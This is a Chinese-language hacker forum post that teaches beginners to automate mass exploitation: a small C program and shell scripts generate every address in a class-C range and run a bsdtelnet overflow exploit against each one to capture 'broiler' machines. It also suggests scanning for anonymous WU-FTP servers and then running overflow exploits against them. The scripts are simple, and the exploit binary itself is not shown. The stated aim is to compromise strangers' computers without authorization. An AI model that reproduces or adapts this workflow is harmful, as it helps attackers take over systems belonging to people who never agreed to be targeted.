论坛: 菜鸟乐园 标题: 关于扫描的技巧与实战 复制本贴地址    
作者: syshunter [syshunter]    版主   登录
关于扫描的技巧与实战

注:该文针对菜鸟级人物所写,会LINUX和SHELL的同志可以一边凉快去了。此篇文章技术版权属TOMYCHEN,本人只负责收集与讲解。

大家很早就会扫描了,扫描嘛,逮到一个IP段扫就是了,反正工具多的是,但要
你在LINUX下找出些肉鸡来,可能很麻烦对吧,首先你要NMAP出可能存在有漏洞的
机器,然后使用EXPLOIT去一台一台试,这样是不是很笨呢?,难道我们就不能在
扫描的时候来使用漏洞的EXPLOIT?不,答案是肯定的,LINUX下的SHELL为我们帮
上了大忙,大刀队兄那篇扫描的技巧不知大家有没有看,上面就提到了SHELL,下
面我们就以一个简单的扫描一个C类IP里BSDTELNET漏洞机器为例子来看看:
$cat num.c
main()
{
    int x;
    for (x=0;x<256;x++)
    printf ("%d\n",x);
}
上面这段C我想不用我多说了吧,他生成一个C类网的网络号,大家在编译后可以
./num >>num.txt来得到这个文本.

#!/bin/sh 
echo -n "please ernter a ip:" 
read ipip                         
list=`cat num.txt` 
for listip in $list 
do 
echo $ipip.$listip
echo >>iplist.txt $ipip.$listip 
done
上面这段我们来说说,read ipip是接受键盘的信息,用来给你输入1.1.1这样一个C
段地址以便与下面的LISTIP合并成真正的ip,list='cat num.txt'是读取我们刚才
生成的num.txt里1-254的网络号,for listip in $list是把刚才list里的num.txt
内容循环读给listip,然后我们用echo $ipip.$listip就可以得到一个真正的ip了
,再通过echo >>iplist.txt $ipip.$listip把最后得到的IP写到iplist.txt.通过
以上步骤,我们得到了一个c类ip,下面我们就来用我们事先就有的bsdtelnet溢出
代码来扫描他们了,如下:

#!/bin/sh 
list=`cat iplist.txt` 
for listip in $list 
do 
./bsdtelnet -c $listip
done

list='cat iplist.txt'读取刚才我们生成的iplist.txt文本,for listip in $list把list里存放的ip循环送给listip, 看这个./bsdtelnet -c $listip,这个
就是调用我们在当前这个SHELL所在的目录执行我们的exploit来对ip进行探测.


全部结束,好了,细心的朋友可能发现了,这样的扫描似乎很慢,呵呵,确实,因为
这样他不管23端口有没有开,不管对方机器是不是BSD的,他都要去溢出试试,在这
里,我只是通过TOMYCHEN兄提供给大家一个巧妙利用SHELL的思路,具体大家可以自
己发挥,比如先在SHELL里调用扫描器扫描,然后把开放有21端口的机器保存下面,
然后再对开了21端口的机器进行验证看是否可匿名,得到会话返回消息,如果是
WU-FTP260等,就可以再调用溢出程序进行测试呀等等.

还是那句老话,技术最重要!
----------------------------------------------------------------
                                                syshunter
                                出自:http://www.unsecret.org/

[此贴被 §溶(syshunter) 在 4月9日11时35分 编辑过]

地主 发表时间: 4/9 11:9

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号